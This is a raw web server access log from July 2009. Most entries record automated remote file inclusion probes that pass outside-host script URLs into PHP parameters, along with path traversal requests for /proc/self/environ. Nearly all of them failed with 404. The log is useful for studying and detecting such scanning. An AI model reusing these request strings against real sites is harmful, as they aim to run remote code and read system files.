69.10.63.163 - - [20/Jul/2009:04:23:17 -0400] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.x-pronet.com/board/test.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.61 [en] (OS/2; U)"
202.191.43.177 - - [20/Jul/2009:04:23:49 -0400] "GET /logs/access_log.Q109070500/index.php?_zb_path=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
202.191.43.177 - - [20/Jul/2009:04:23:49 -0400] "GET /logs/access_log.Q109070500/index.php?_zb_path=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
121.169.189.169 - - [20/Jul/2009:04:23:59 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L3131A34C5964B700068203E+M37+ENG HTTP/1.1" 200 46819 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
67.15.177.55 - - [20/Jul/2009:04:24:00 -0400] "GET /logs/access_log.Q109053100//citywriter/head.php?path=http://www.sexcam-tv.de/cache/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
67.15.177.55 - - [20/Jul/2009:04:24:00 -0400] "GET /logs/access_log.Q109051600//citywriter/head.php?path=http://www.sexcam-tv.de/cache/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:04:24:00 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:04:24:00 -0400] "GET /logs/access_log.Q109070200//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:04:24:01 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
200.234.200.230 - - [20/Jul/2009:04:24:21 -0400] "GET /logs/access_log.Q109053000/index1.php?x=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
200.234.200.230 - - [20/Jul/2009:04:24:21 -0400] "GET /logs/index1.php?x=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
200.234.200.230 - - [20/Jul/2009:04:24:21 -0400] "GET /index1.php?x=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
200.234.200.230 - - [20/Jul/2009:04:24:21 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
200.234.200.230 - - [20/Jul/2009:04:24:21 -0400] "GET /logs/access_log.Q109053000/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
200.234.200.230 - - [20/Jul/2009:04:24:21 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
200.234.200.230 - - [20/Jul/2009:04:24:22 -0400] "GET /logs/index1.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 213 "-" "XXXXXX"
200.234.200.230 - - [20/Jul/2009:04:24:22 -0400] "GET /logs/access_log.Q109053000/index1.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 235 "-" "XXXXXX"
200.234.200.230 - - [20/Jul/2009:04:24:22 -0400] "GET /index1.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 208 "-" "XXXXXX"
200.234.200.230 - - [20/Jul/2009:04:24:22 -0400] "GET /logs/index1.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "XXXXXX"
200.234.200.230 - - [20/Jul/2009:04:24:22 -0400] "GET /logs/access_log.Q109053000/index1.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "XXXXXX"
200.234.200.230 - - [20/Jul/2009:04:24:22 -0400] "GET /index1.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "XXXXXX"
211.15.55.45 - - [20/Jul/2009:04:24:42 -0400] "GET /logs/access_log.Q109061400/index.php?_zb_path=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
211.15.55.45 - - [20/Jul/2009:04:24:42 -0400] "GET /index.php?_zb_path=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
211.15.55.45 - - [20/Jul/2009:04:24:43 -0400] "GET /logs/index.php?_zb_path=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
200.6.155.240 - - [20/Jul/2009:04:25:07 -0400] "GET /logs/access_log.Q109053100%20%20//citywriter/head.php?path=http://www.nsau.edu.ru//images/banners/lib/fatal1.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
200.6.155.240 - - [20/Jul/2009:04:25:07 -0400] "GET /logs//citywriter/head.php?path=http://www.nsau.edu.ru//images/banners/lib/fatal1.txt???? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
200.6.155.240 - - [20/Jul/2009:04:25:07 -0400] "GET //citywriter/head.php?path=http://www.nsau.edu.ru//images/banners/lib/fatal1.txt???? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
200.6.155.240 - - [20/Jul/2009:04:25:07 -0400] "GET /logs/access_log.Q109051600%20%20//citywriter/head.php?path=http://www.nsau.edu.ru//images/banners/lib/fatal1.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.15.55.45 - - [20/Jul/2009:04:25:23 -0400] "GET /logs/access_log.Q109070500/index.php?_zb_path=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
200.234.200.230 - - [20/Jul/2009:04:25:46 -0400] "GET /logs/access_log.Q109050700/index1.php?x=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
200.234.200.230 - - [20/Jul/2009:04:25:46 -0400] "GET /logs/access_log.Q109050700/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
200.234.200.230 - - [20/Jul/2009:04:25:47 -0400] "GET /logs/access_log.Q109050700/index1.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 235 "-" "XXXXXX"
200.234.200.230 - - [20/Jul/2009:04:25:47 -0400] "GET /logs/access_log.Q109050700/index1.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "XXXXXX"
202.191.43.177 - - [20/Jul/2009:04:26:01 -0400] "GET /logs/error_log.Q109051800/config.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
202.191.43.177 - - [20/Jul/2009:04:26:01 -0400] "GET /logs/error_log.Q109051800/config.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
210.218.5.234 - - [20/Jul/2009:04:26:12 -0400] "GET /logs//citywriter/head.php?path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
210.218.5.234 - - [20/Jul/2009:04:26:12 -0400] "GET /logs/access_log.Q109053100//citywriter/head.php?path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
210.218.5.234 - - [20/Jul/2009:04:26:12 -0400] "GET //citywriter/head.php?path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
210.218.5.234 - - [20/Jul/2009:04:26:12 -0400] "GET /logs/access_log.Q109051600//citywriter/head.php?path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jul/2009:04:26:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.247 - - [20/Jul/2009:04:26:25 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L017D6C4C41442200EE41031+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.73.47.130 - - [20/Jul/2009:04:27:17 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
125.243.207.199 - - [20/Jul/2009:04:28:07 -0400] "GET //citywriter/head.php?path=http://ie2.postech.ac.kr/2005/bbs/zipcode/1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
125.243.207.199 - - [20/Jul/2009:04:28:07 -0400] "GET /logs/access_log.Q109053100//citywriter/head.php?path=http://ie2.postech.ac.kr/2005/bbs/zipcode/1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
125.243.207.199 - - [20/Jul/2009:04:28:07 -0400] "GET /logs//citywriter/head.php?path=http://ie2.postech.ac.kr/2005/bbs/zipcode/1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
211.15.55.45 - - [20/Jul/2009:04:28:10 -0400] "GET /logs/error_log.Q109051800/config.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
125.243.207.199 - - [20/Jul/2009:04:28:11 -0400] "GET /logs/access_log.Q109051600//citywriter/head.php?path=http://ie2.postech.ac.kr/2005/bbs/zipcode/1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
200.6.155.240 - - [20/Jul/2009:04:28:21 -0400] "GET /logs/access_log.Q109053100//citywriter/head.php?path=http://www.nsau.edu.ru//images/banners/lib/fatal1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
200.6.155.240 - - [20/Jul/2009:04:28:22 -0400] "GET /logs/access_log.Q109051600//citywriter/head.php?path=http://www.nsau.edu.ru//images/banners/lib/fatal1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
202.125.45.45 - - [20/Jul/2009:04:28:30 -0400] "GET /logs//images/errors.php?error=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
202.125.45.45 - - [20/Jul/2009:04:28:30 -0400] "GET //images/errors.php?error=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
202.125.45.45 - - [20/Jul/2009:04:28:30 -0400] "GET /logs/error_log.Q109062600//images/errors.php?error=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
202.125.45.45 - - [20/Jul/2009:04:28:36 -0400] "GET /logs/error_log.Q109061500//images/errors.php?error=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
81.3.82.4 - - [20/Jul/2009:04:29:17 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
81.3.82.4 - - [20/Jul/2009:04:29:17 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
118.129.166.10 - - [20/Jul/2009:04:29:18 -0400] "GET //includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
118.129.166.10 - - [20/Jul/2009:04:29:18 -0400] "GET /logs/access_log.Q109052600%20%20//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
118.129.166.10 - - [20/Jul/2009:04:29:19 -0400] "GET /logs/access_log.Q109051200%20%20//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
118.129.166.10 - - [20/Jul/2009:04:29:20 -0400] "GET /logs//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
81.3.82.4 - - [20/Jul/2009:04:29:20 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
81.3.82.4 - - [20/Jul/2009:04:29:20 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
200.204.85.68 - - [20/Jul/2009:04:30:52 -0400] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.msgwebmailcontrol.com/botp/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
201.232.54.48 - - [20/Jul/2009:04:30:56 -0400] "GET /logs/access_log.Q109051800/config.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
201.232.54.48 - - [20/Jul/2009:04:30:56 -0400] "GET /config.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
201.232.54.48 - - [20/Jul/2009:04:30:59 -0400] "GET /logs/config.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
209.59.12.99 - - [20/Jul/2009:04:31:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.63.91.170 - - [20/Jul/2009:04:31:54 -0400] "GET /logs/access_log.Q109051200/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
62.128.142.219 - - [20/Jul/2009:04:32:15 -0400] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
62.128.142.219 - - [20/Jul/2009:04:32:15 -0400] "GET /logs/access_log.Q109063000//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
62.128.142.219 - - [20/Jul/2009:04:32:15 -0400] "GET /logs/access_log.Q109063000//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
62.128.142.219 - - [20/Jul/2009:04:32:15 -0400] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
62.128.142.219 - - [20/Jul/2009:04:32:15 -0400] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
62.128.142.219 - - [20/Jul/2009:04:32:16 -0400] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
118.129.166.10 - - [20/Jul/2009:04:32:38 -0400] "GET /logs//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
118.129.166.10 - - [20/Jul/2009:04:32:39 -0400] "GET //includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
118.129.166.10 - - [20/Jul/2009:04:32:44 -0400] "GET /logs/access_log.Q109052600%20%20//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
118.129.166.10 - - [20/Jul/2009:04:32:45 -0400] "GET /logs/access_log.Q109051200%20%20//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
218.145.31.242 - - [20/Jul/2009:04:34:40 -0400] "GET /logs/access_log.Q109052400/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://2006.aninite.at/mambots/perkosa.txt??? HTTP/1.1" 404 293 "-" "libwww-perl/5.79"
218.145.31.242 - - [20/Jul/2009:04:34:40 -0400] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://2006.aninite.at/mambots/perkosa.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
218.145.31.242 - - [20/Jul/2009:04:34:40 -0400] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://2006.aninite.at/mambots/perkosa.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
218.145.31.242 - - [20/Jul/2009:04:34:52 -0400] "GET /logs/access_log.Q109070900/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://2006.aninite.at/mambots/perkosa.txt??? HTTP/1.1" 404 293 "-" "libwww-perl/5.79"
62.128.142.219 - - [20/Jul/2009:04:35:04 -0400] "GET /logs/access_log.Q109063000%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
62.128.142.219 - - [20/Jul/2009:04:35:06 -0400] "GET /logs/access_log.Q109063000%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
218.145.31.242 - - [20/Jul/2009:04:35:09 -0400] "GET /logs/access_log.Q109052400/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://2006.aninite.at/mambots/perkosa.txt??? HTTP/1.1" 404 293 "-" "libwww-perl/5.79"
218.145.31.242 - - [20/Jul/2009:04:35:09 -0400] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://2006.aninite.at/mambots/perkosa.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
218.145.31.242 - - [20/Jul/2009:04:35:09 -0400] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://2006.aninite.at/mambots/perkosa.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
218.145.31.242 - - [20/Jul/2009:04:35:22 -0400] "GET /logs/access_log.Q109070900/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://2006.aninite.at/mambots/perkosa.txt??? HTTP/1.1" 404 293 "-" "libwww-perl/5.79"
125.243.207.199 - - [20/Jul/2009:04:35:26 -0400] "GET /logs/access_log.Q109053100%20%20//citywriter/head.php?path=http://ie2.postech.ac.kr/2005/bbs/zipcode/1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
125.243.207.199 - - [20/Jul/2009:04:35:30 -0400] "GET /logs/access_log.Q109051600%20%20//citywriter/head.php?path=http://ie2.postech.ac.kr/2005/bbs/zipcode/1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
212.97.132.151 - - [20/Jul/2009:04:35:33 -0400] "GET /errors.php?error=http://www.intense.altervista.org/php6/middle.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
206.225.23.4 - - [20/Jul/2009:04:36:14 -0400] "GET /board//include/footer.php?_path[counter]=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:04:36:14 -0400] "GET /logs/access_log.Q109062500%20%20/board//include/footer.php?_path[counter]=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:04:36:14 -0400] "GET /logs/board//include/footer.php?_path[counter]=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:04:36:21 -0400] "GET /board//include/footer.php?_path[counter]=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:04:36:21 -0400] "GET /logs/board//include/footer.php?_path[counter]=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:04:36:21 -0400] "GET /logs/access_log.Q109062500%20%20/board//include/footer.php?_path[counter]=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jul/2009:04:36:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
206.225.23.4 - - [20/Jul/2009:04:36:56 -0400] "GET /logs/access_log.Q109062500/board//include/footer.php?_path[counter]=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:04:36:59 -0400] "GET /logs/access_log.Q109062500/board//include/footer.php?_path[counter]=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
212.193.229.157 - - [20/Jul/2009:04:37:09 -0400] "GET /logs/access_log.Q109061400/index.php?_zb_path=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
212.193.229.157 - - [20/Jul/2009:04:37:09 -0400] "GET /index.php?_zb_path=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
212.193.229.157 - - [20/Jul/2009:04:37:09 -0400] "GET /logs/index.php?_zb_path=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
74.63.91.170 - - [20/Jul/2009:04:37:48 -0400] "GET /include/write.php?dir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
74.63.91.170 - - [20/Jul/2009:04:37:48 -0400] "GET /logs/include/write.php?dir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
74.63.91.170 - - [20/Jul/2009:04:37:48 -0400] "GET /logs/access_log.Q109051100%20%20/include/write.php?dir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
202.125.45.45 - - [20/Jul/2009:04:38:01 -0400] "GET /logs/access_log.Q109063000//images/errors.php?error=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
202.125.45.45 - - [20/Jul/2009:04:38:01 -0400] "GET //images/errors.php?error=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
202.125.45.45 - - [20/Jul/2009:04:38:01 -0400] "GET /logs//images/errors.php?error=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
212.193.229.157 - - [20/Jul/2009:04:38:13 -0400] "GET /logs/access_log.Q109070500/index.php?_zb_path=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
202.125.45.45 - - [20/Jul/2009:04:38:53 -0400] "GET /logs/error_log.Q109063000//images/errors.php?error=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
61.78.62.84 - - [20/Jul/2009:04:38:56 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:04:38:56 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:04:38:56 -0400] "GET /logs/access_log.Q109063000//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:04:39:29 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:04:39:29 -0400] "GET /logs/access_log.Q109063000%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:04:39:29 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:04:40:02 -0400] "GET /logs/access_log.Q109063000//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:04:40:04 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:04:40:04 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
82.195.150.228 - - [20/Jul/2009:04:40:37 -0400] "GET /logs/access_log.Q109061400/index.php?_zb_path=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
82.195.150.228 - - [20/Jul/2009:04:40:37 -0400] "GET /logs/index.php?_zb_path=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
82.195.150.228 - - [20/Jul/2009:04:40:49 -0400] "GET /logs/access_log.Q109070500/index.php?_zb_path=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
209.59.12.99 - - [20/Jul/2009:04:41:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
202.125.45.45 - - [20/Jul/2009:04:41:56 -0400] "GET /logs/error_log.Q109051900%20//images/errors.php?error=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
202.125.45.45 - - [20/Jul/2009:04:41:56 -0400] "GET /logs/error_log.Q109060300%20//images/errors.php?error=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
74.63.91.170 - - [20/Jul/2009:04:42:01 -0400] "GET /logs/error_log.Q109051100%20%20/include/write.php?dir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
203.84.238.7 - - [20/Jul/2009:04:43:29 -0400] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.x-pronet.com/board/test.txt?? HTTP/1.1" 404 246 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
